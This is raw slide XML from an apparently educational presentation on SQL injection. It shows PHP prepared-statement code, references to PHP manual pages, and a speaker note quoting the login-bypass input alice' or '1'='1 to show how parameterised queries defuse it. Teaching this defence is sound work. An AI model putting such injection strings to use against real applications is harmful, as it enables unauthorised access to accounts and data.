                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>$mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>prepare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>$query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>$stmt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>bindParam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t> 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>$name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="FF8000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>$name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>$argv[0]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>$stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="007700"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="593" name="Shape 593"/>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code came from</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>http://php.net/manual/en/security.database.sql-injection.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="601" name="Shape 601"/>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Shape 607"/>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rPr lang="en-US"/>
              <a:t>Question for the audience</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>explain SQL comments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="608" name="Shape 608"/>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18" name="Shape 618"/>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25" name="Shape 62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rPr lang="en-US"/>
              <a:t>This forces the application to look for a username that litterally matches </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>alice' or '1'='1.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-295275" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="252525"/>
              </a:buClr>
              <a:buSzPct val="95454"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>clearer example visually</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="252525"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>code came from</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>http://php.net/manual/en/mysqli-stmt.execute.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="626" name="Shape 62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Shape 632"/>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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="633" name="Shape 633"/>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Shape 64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41" name="Shape 641"/>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642" name="Shape 642"/>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36" name="Shape 13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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="648" name="Shape 648"/>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Shape 65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55" name="Shape 65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56" name="Shape 65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64" name="Shape 664"/>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72" name="Shape 672"/>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Shape 67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79" name="Shape 67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680" name="Shape 68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Shape 686"/>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87" name="Shape 687"/>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88" name="Shape 688"/>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Shape 694"/>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695" name="Shape 695"/>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696" name="Shape 696"/>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Shape 70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704" name="Shape 70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indent="-317500" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Tweet example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="705" name="Shape 70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Shape 711"/>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12" name="Shape 712"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701040" y="4415790"/>
            <a:ext cx="5608200" cy="4183500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="46575" lIns="93175" rIns="93175" wrap="square"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713" name="Shape 713"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3970938" y="8829967"/>
            <a:ext cx="3037800" cy="464700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="46575" lIns="93175" rIns="93175" wrap="square" tIns="46575">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Shape 718"/>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719" name="Shape 719"/>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720" name="Shape 720"/>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55" name="Shape 15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Shape 726"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701040" y="4415790"/>
            <a:ext cx="5608320" cy="4183380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="727" name="Shape 727"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1181100" y="696913"/>
            <a:ext cx="46482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Shape 733"/>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734" name="Shape 734"/>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735" name="Shape 735"/>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68" name="Shape 168"/>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1181100" y="696913"/>
            <a:ext cx="4648200" cy="34863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701040" y="4415790"/>
            <a:ext cx="5608200" cy="4183500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="Shape 181"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3970938" y="8829967"/>
            <a:ext cx="3037800" cy="464700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="46575" lIns="93175" rIns="93175" wrap="square"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8" name="Shape 18"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2130425"/>
            <a:ext cx="7772400" cy="1470025"/>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 name="Shape 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3886200"/>
            <a:ext cx="6400800" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square"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21" name="Shape 21"/>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 name="Shape 22"/>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3" name="Shape 23"/>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75" name="Shape 75"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Shape 76"/>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7" name="Shape 77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2309018" y="-251619"/>
            <a:ext cx="4525963" cy="8229600"/>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78" name="Shape 78"/>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0" name="Shape 80"/>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81" name="Shape 81"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Shape 82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4732337" y="2171700"/>
            <a:ext cx="5851525" cy="20574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3" name="Shape 83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="541338" y="190501"/>
            <a:ext cx="5851525" cy="6019800"/>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Shape 84"/>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5" name="Shape 85"/>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6" name="Shape 86"/>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4" name="Shape 24"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Shape 25"/>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lt1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="4400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>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6" name="Shape 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="-139700" lvl="0" marL="342900" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr b="0" i="0" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-107950" lvl="1" marL="742950" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr b="0" i="0" sz="2800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-76200" lvl="2" marL="1143000" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-101600" lvl="3" marL="16002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4pPr>
            <a:lvl5pPr indent="-101600" lvl="4" marL="2057400" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt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7" name="Shape 27"/>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8" name="Shape 28"/>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9" name="Shape 29"/>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30" name="Shape 30"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Shape 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722313" y="4406900"/>
            <a:ext cx="7772400" cy="1362075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square"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2" name="Shape 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722313" y="2906713"/>
            <a:ext cx="7772400" cy="1500187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" wrap="square"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33" name="Shape 33"/>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36" name="Shape 36"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
